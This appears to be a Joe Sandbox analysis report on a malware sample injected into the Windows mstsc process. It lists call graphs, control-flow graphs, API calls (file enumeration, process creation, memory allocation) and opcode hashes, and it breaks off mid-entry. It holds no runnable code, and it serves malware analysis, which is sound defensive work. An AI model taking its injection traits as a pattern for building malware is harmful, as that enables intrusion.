48505 d3a0c 48504->48505 48506 d3ac5 48505->48506 48507 d56a0 7 API calls 48505->48507 48506->48384 48507->48506 48509 d889e 48508->48509 48510 d88a5 48508->48510 48509->48390 48511 ca140 LdrLoadDll 48510->48511 48512 d88d0 48511->48512 48513 dc0c0 RtlAllocateHeap 48512->48513 48516 d8a14 48512->48516 48514 d88e8 48513->48514 48515 dbef0 RtlFreeHeap 48514->48515 48514->48516 48515->48516 48516->48390 48519 d1689 48517->48519 48518 d177c 48518->48408 48519->48518 48520 d171e FindFirstFileW 48519->48520 48520->48518 48523 d1739 48520->48523 48521 d1763 FindNextFileW 48522 d1775 FindClose 48521->48522 48521->48523 48522->48518 48523->48521 48525 cdc40 48524->48525 48527 cdc38 48524->48527 48526 d8890 3 API calls 48525->48526 48526->48527 48527->48441 48529 cf2d5 48528->48529 48530 cf1c0 48528->48530 48529->48444 48531 d56a0 7 API calls 48530->48531 48532 cf1d8 48531->48532 48532->48529 48533 d56a0 7 API calls 48532->48533 48534 cf208 48533->48534 48534->48529 48535 dbef0 RtlFreeHeap 48534->48535 48535->48529 48537 cf935 48536->48537 48538 cfcec 48537->48538 48539 d56a0 7 API calls 48537->48539 48538->48313 48540 cf99c 48539->48540 48540->48538 48585 da690 48540->48585 48542 cf9d2 48543 cfcd4 48542->48543 48545 dd1d0 2 API calls 48542->48545 48544 dbef0 RtlFreeHeap 48543->48544 48544->48538 48546 cf9f1 48545->48546 48546->48543 48547 cfaf4 48546->48547 48548 d9eb0 LdrInitializeThunk 48546->48548 48550 cb1a0 2 API calls 48547->48550 48549 cfa75 48548->48549 48549->48547 48554 cfa7d 48549->48554 48551 cfb1f 48550->48551 48551->48543 48555 cfb54 48551->48555 48558 cb090 LdrInitializeThunk 48551->48558 48552 cfada 48556 dbef0 RtlFreeHeap 48552->48556 48553 cfaa9 48559 da440 NtClose 48553->48559 48554->48538 48554->48552 48554->48553 48557 cb090 LdrInitializeThunk 48554->48557 48560 caf10 4 API calls 48555->48560 48561 cfaea 48556->48561 48557->48553 48558->48555 48562 cfab9 48559->48562 48563 cfb76 48560->48563 48561->48313 48564 d92e0 LdrInitializeThunk 48562->48564 48565 cfb84 48563->48565 48566 cfcb3 48563->48566 48564->48552 48567 da4b0 LdrInitializeThunk 48565->48567 48568 dbef0 RtlFreeHeap 48566->48568 48570 cfba3 48567->48570 48569 cfcca 48568->48569 48569->48313 48571 cd800 2 API calls 48570->48571 48572 cfc08 48571->48572 48572->48543 48573 cfc13 48572->48573 48574 dbef0 RtlFreeHeap 48573->48574 48575 cfc37 48574->48575 48576 da010 LdrInitializeThunk 48575->48576 48577 cfc4b 48576->48577 48578 d9fc0 LdrInitializeThunk 48577->48578 48579 cfc72 48578->48579 48580 cfc79 48579->48580 48581 da010 LdrInitializeThunk 48579->48581 48580->48313 48582 cfc9b 48581->48582 48583 d9dd0 LdrInitializeThunk 48582->48583 48584 cfca9 48583->48584 48584->48313 48586 daf60 48585->48586 48587 da6af CreateProcessInternalW 48586->48587 48587->48542 48590 cf184 7 API calls 48594 da021 LdrInitializeThunk 48727 25f69cf 12 API calls 48611 dd093 RtlAllocateHeap 48612 cb193 LdrInitializeThunk LdrInitializeThunk 48588 c90af 11 API calls 48598 cd2b8 9 API calls 48740 25e4f9a 11 API calls ___swprintf_l 48675 d10c8 RtlFreeHeap 48680 cc0d5 NtClose LdrInitializeThunk LdrInitializeThunk 48749 25b0184 7 API calls ___swprintf_l 48681 25d98ba 17 API calls 48597 cb1fd 19 API calls 48599 dd0f8 RtlFreeHeap 48685 dc0f7 RtlAllocateHeap

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 689 d33c0-d3427 CoInitialize CoCreateInstance 690 d342d-d343e 689->690 691 d34bb-d34cb OleUninitialize 689->691 693 d34b0-d34b8 690->693 694 d3440-d3450 690->694 693->691 695 d3455-d3457 694->695 696 d3459-d345e 695->696 697 d34a2-d34ad 695->697 698 d349a-d34a0 696->698 699 d3460-d346d call dc400 696->699 697->693 698->694 698->697 703 d346f-d3471 699->703 704 d3474-d3496 call dc200 call dbf10 699->704 703->704 704->698
                                              APIs
                                              • CoInitialize.OLE32(00000000,00000000,000C3D06,00000000), ref: 000D33D7
                                              • CoCreateInstance.OLE32(?,00000000,00000001,?,?), ref: 000D3423
                                              • OleUninitialize.OLE32 ref: 000D34BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize
                                              • String ID: @J7<
                                              • API String ID: 948891078-2016760708
                                              • Opcode ID: 8bd81b321109a2155e045c751a242a522052c9b934456cc777292468902f298c
                                              • Instruction ID: e2d313be4bbda2283281b2c580389e2b3d6ea8c461f4f56b7991287926620eb8
                                              • Opcode Fuzzy Hash: 8bd81b321109a2155e045c751a242a522052c9b934456cc777292468902f298c
                                              • Instruction Fuzzy Hash: A3311CB5A0070AAFDB00DFD8C8809EFB7B9BF88304B108559E515AB314D775EE058BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 709 d1660-d16fe call dbf90 * 2 call d5aa0 * 3 720 d177c-d1784 709->720 721 d1700-d1702 709->721 721->720 722 d1704-d1708 721->722 722->720 723 d170a-d170c 722->723 723->720 724 d170e-d1737 call d0a40 FindFirstFileW 723->724 724->720 727 d1739-d173c 724->727 728 d1740-d1747 727->728 729 d1749-d1760 call d1540 728->729 730 d1763-d1773 FindNextFileW 728->730 729->730 730->728 731 d1775-d1779 FindClose 730->731 731->720
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,00000000), ref: 000D172F
                                              • FindNextFileW.KERNEL32(?,00000010), ref: 000D176E
                                              • FindClose.KERNEL32(?), ref: 000D1779
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: 151f3c0cb29038064a7b48d86c683f9cbf391c3b50f36f14df04ac2ae8c7f5dd
                                              • Instruction ID: af674d1e492f9c2779b05984a18d1d3b43338d9b140753a9c742a029da8b3fda
                                              • Opcode Fuzzy Hash: 151f3c0cb29038064a7b48d86c683f9cbf391c3b50f36f14df04ac2ae8c7f5dd
                                              • Instruction Fuzzy Hash: 6031B675900319BBDB60DF64CC85FEF77BCAF44705F104559B90966291DBB0AA84CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,000D5807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,000D5807,00000000,00000005,00000060,00000000,00000000), ref: 000DA35D
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                              • Instruction ID: da3d3df29fd984b8037af6979a24edade33196fd64a9f549334aa001e7459a8c
                                              • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                              • Instruction Fuzzy Hash: 5CF0BDB2200208AFCB08CF88DC85EEB37ADEF8C754F118248BA0997241C630F8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(000D59C2,5DA515B3,FFFFFFFF,000D5681,00000206,?,000D59C2,00000206,000D5681,FFFFFFFF,5DA515B3,000D59C2,00000206,00000000), ref: 000DA405
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                              • Instruction ID: e73262ca375c0ff610655b1f0b202fd955da8ab4b36c52848dc5a7a14fd7ac9c
                                              • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                              • Instruction Fuzzy Hash: D5F0A4B2200208ABCB14DF99DC85EEB77ADEF8C754F158259BA0D97241D630E811CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA529
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                              • Instruction ID: 609e413d0085b32fcea70b415c988fb869e5d6aa4e9af4255036947eca0f9c0e
                                              • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                              • Instruction Fuzzy Hash: 85F015B2210208ABDB14DF89DC81EEB77ADEF8C754F118159BE0897241C630F810CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(000D59A0,00000206,?,000D59A0,00000005,FFFFFFFF), ref: 000DA465
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                              • Instruction ID: 81a34db36c881d1bcf8106edddb350d23a71249db4e54bfc3c97c4aeaa9b6994
                                              • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                              • Instruction Fuzzy Hash: 91D01772200218ABD620EB98DC89ED77BACDF49A60F1180A5BA485B242C530FA0086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
